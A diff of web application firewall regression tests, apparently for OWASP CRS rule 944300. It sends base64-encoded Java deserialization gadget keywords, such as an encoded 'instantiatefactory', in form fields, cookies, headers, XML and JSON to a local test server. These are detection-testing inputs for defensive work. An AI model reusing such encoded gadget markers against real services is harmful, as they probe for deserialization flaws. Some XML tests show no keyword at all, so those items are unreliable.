80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 130 desc: "Content-Type text/plain 
includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
\"Bmb3JjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-136 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
\"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: 
+ log: + expect_ids: [944300] + - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-154 + - input: + 